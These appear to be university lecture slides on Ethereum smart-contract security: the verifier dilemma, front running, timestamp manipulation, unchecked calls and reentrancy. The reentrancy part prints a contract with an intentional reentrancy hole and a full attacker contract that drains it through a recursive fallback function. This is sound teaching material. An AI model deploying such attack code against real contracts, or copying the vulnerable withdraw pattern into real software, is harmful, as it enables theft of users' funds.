

CSE 2550: Blockchain Technology I

Lecture 8 Ethereum - Part III

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Outline

- Security issues in Ethereum (or smart contract platforms in general).
 - Veirifer Dilemma.
 - Transaction ordering dependency.
 - Block timestamp dependency.
 - Mishandeld exceptions.
 - Reentrancy attack.

Writing Secure Smart Contracts

- Writing secure code is hard.
 - It needs extensive testing to cover all paths an attacker may utilize while interacting with the code.
 - Attackers are financially motivated to hack smart contracts.
 - Bugs literally cost money.
 - Lack of understanding how the underlying network or cryptocurrency system works may lead to writing buggy code.
- And remember, you cannot patch a buggy smart contract code.
 - So it is like recovering from a code security vulnerability is almost impossible.

Is It All About Code?

- Ethereum is an ecosystem that allows deploying smart contracts as a way to build new applications and services.
 - It has security issues Like any other large-scale blockchain-based system.
 - DoS, tendency towards centralization, 51% attack, Eclipse/Goldfinger attacks, etc.
- Securing these services requires:
 - Extensive threat modeling.
 - Understanding how Ethereum/blockchain-based systems work.
 - Security by design; integrating countermeasures into the application design.

Security Issues

- In this lecture, we will study the following security issues:
 - Verifier Dilemma.
 - Transaction ordering dependency.
 - Timestamp dependency.
 - Mishandled exceptions.
 - Reentrancy vulnerability.

Verifier Dilemma

- A potential security threat that may arise due to complexity of computation a smart contract implements.
- Upon receiving a newly mined block, a miner is supposed to verify the validity of each transaction in this block before accepting it.
 - In Ethereum, this means re-executing all transactions that call functions from smart contracts and check the new EVM state.
 - Sometimes the contract code is complex and requires significant amount of resources to execute.
- However, malicious miners may not verify the correctness of the transactions.
 - Done to save time/computing resources so they can start working on the proof-of-work race before honest miners.

To validate, or not to validate, that is the question!

- This leaves honest miners with dilemma of whether to validate blocks received from others or not.
 - Validate -- malicious miners may win the mining race faster, hence, risk losing the mining rewards.
 - Not validate -- may lead to adopting an invalid blocks in the blockchain.
- This dilemma applies also to other cryptocurrencies.
 - Risk is higher when non-trivial computation is needed to verify transactions.

Verifier Dilemma - Potential Solutions

- Simplify the scripting language, so make it simpler and faster to verify scripts.
 - This limits the flexibility and supported functionality of the systems.
- Design correctness proofs with fast verification time.
 - Verifying the computation does not require re-executing the whole computation.
 - Non-trivial to come up with such proof systems.
 - Also, they may introduce additional assumptions like a trusted setup, and may degrade prover's efficiency.
- Ethereum switched to proof of stake, will this help with the verifier dilemma problem?

Transaction Ordering Dependency I

- Also called race condition or front running.
- The state of the blockchain, and hence, the state of the deployed smart contracts depends on the order of executing the transactions.
 - Two transactions issued at the same time, or in close time intervals, from different accounts can be executed in an arbitrary order.
 - Recall that for transactions tied to the same account, the transaction nonce is used to resolve order issues.
- An attacker may utilize this dependency to gain monetary profits.
 - Observe transactions from others and act accordingly by issuing competing transactions.
 - Network propagation delays, and other factors like transaction fees, may result in executing the attacker's transaction first.

Transaction Ordering Dependency II

- For example, consider a puzzle solving contract where Alice posts a contract rewarding for solving a puzzle.
 - Bob has solved the puzzle and issued a transaction containing the solution.
 - Alice monitors the network, once it hears about Bob's transaction, she issues another transaction to withdraw the bounty.
 - There is a chance that Alice's transaction will be executed first, hence, Alice obtains the puzzle solution for free.

Timestamp Dependency

- Also called block timestamp manipulation.
- Some smart contracts may use the timestamps of the blocks on the blockchain.
 - For example, use the hash of a future block and its timestamp to determine the outcome of a lottery draw.
- A miner sets the timestamp based on its local machine.
 - It can vary by up to 900 seconds and still accepted by other miners.
- Hence, a miner can set this timestamp in a way that influences the contract in the way it desires.
 - Tying this to the above example, a miner can change the timestamp in a way that produces a favorable lottery draw outcome.

Mishandled Exceptions

- This occurs in contracts with code that does not check whether a function call has succeeded or not.
 - Usually happens when invoking functions from external contracts.
- For example, let's modify our Market smart contract to allow the owner to sell the market to someone else. So the owner address will be changed.
 - Once the original owner receives the money from the new owner, which is also using a function inside the contract, change the owner's address
 - If the money sending function fails, and the contract does not check for such failure and act accordingly, the new owner will get the market for free.

Reentrancy Vulnerability I

- The vulnerability behind The DAO incident.
- Happens when a contract calls a function from another contract.
 - The state of the caller contract is not updated until the execution of invoked function is completed.
 - An attacker may exploit the intermediate state (these produced before the final update) to attack the smart contract.
- Usually exploits a fallback function defined in an external contract (a function that is called if no function match is found).
 - This function will be invoked by the attacked contract.
 - The body of this function is the code that exploits the intermediate state of the attacked contract.
- At least in the DAO incident, it was used to drain the currency in the DAO contract account.

Reentrancy Vulnerability II

- For example, assume we have a contract that allows a party to withdraw her own balance and then zeros the balance.
 - This contract allows the caller to specify an address to send the withdrawn currency to.
 - An attacker, may craft a contract and ask to send the money to this contract's address instead of an EOA address.
 - The fallback function in the crafted contract calls the withdraw balance function several times. Will go through since zeroing the balance comes after finishing the call.
 - This allows the attacker to withdraw all the attacked contract's money instead of her balance only.
- This exactly what happened in The DAO attack.

Reentrancy Example I

Example 9-1. EtherStore.sol

```
1 contract EtherStore {
2
3     uint256 public withdrawallLimit = 1 ether;
4     mapping(address => uint256) public lastWithdrawTime;
5     mapping(address => uint256) public balances;
6
7     function depositFunds() public payable {
8         balances[msg.sender] += msg.value;
9     }
10
11     function withdrawFunds (uint256 _weiToWithdraw) public {
12         require(balances[msg.sender] >= _weiToWithdraw);
13         // limit the withdrawal
14         require(_weiToWithdraw <= withdrawallLimit);
15         // limit the time allowed to withdraw
16         require(now >= lastWithdrawTime[msg.sender] + 1 weeks);
17         require(msg.sender.call.value(_weiToWithdraw)());
18         balances[msg.sender] -= _weiToWithdraw;
19         lastWithdrawTime[msg.sender] = now;
20     }
21 }
```

Reentrancy Example II

Example 9-2. Attack.sol

```
1 import "EtherStore.sol";
2
3 contract Attack {
4     EtherStore public etherStore;
5
6     // initialize the etherStore variable with the contract address
7     constructor(address _etherStoreAddress) {
8         etherStore = EtherStore(_etherStoreAddress);
9     }
10
11    function attackEtherStore() public payable {
12        // attack to the nearest ether
13        require(msg.value >= 1 ether);
14        // send eth to the depositFunds() function
15        etherStore.depositFunds.value(1 ether)();
16        // start the magic
17        etherStore.withdrawFunds(1 ether);
18    }
19
20    function collectEther() public {
21        msg.sender.transfer(this.balance);
22    }
23
24    // fallback function - where the magic happens
25    function () payable {
26        if (etherStore.balance > 1 ether) {
27            etherStore.withdrawFunds(1 ether);
28        }
29    }
30 }
```

How to fix it?

Other Vulnerabilities

- As in conventional coding:
 - Buffer overflow.
 - Input/output sanity checking.
 - The use of external services/contracts that could be insecure.
 - Buggy built-in helper functions.
 - Uninitialized pointers.
 - etc.

References

- Luu et al., "Demystifying incentives in the consensus computer." In Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, pp. 706-719. ACM, 2015.
- Luu, Loi, Duc-Hiep Chu, Hrishikesh Olickel, Prateek Saxena, and Aquinas Hobor. "Making smart contracts smarter." In *Proceedings of the 2016 ACM SIGSAC conference on computer and communications security*, pp. 254-269. ACM, 2016.

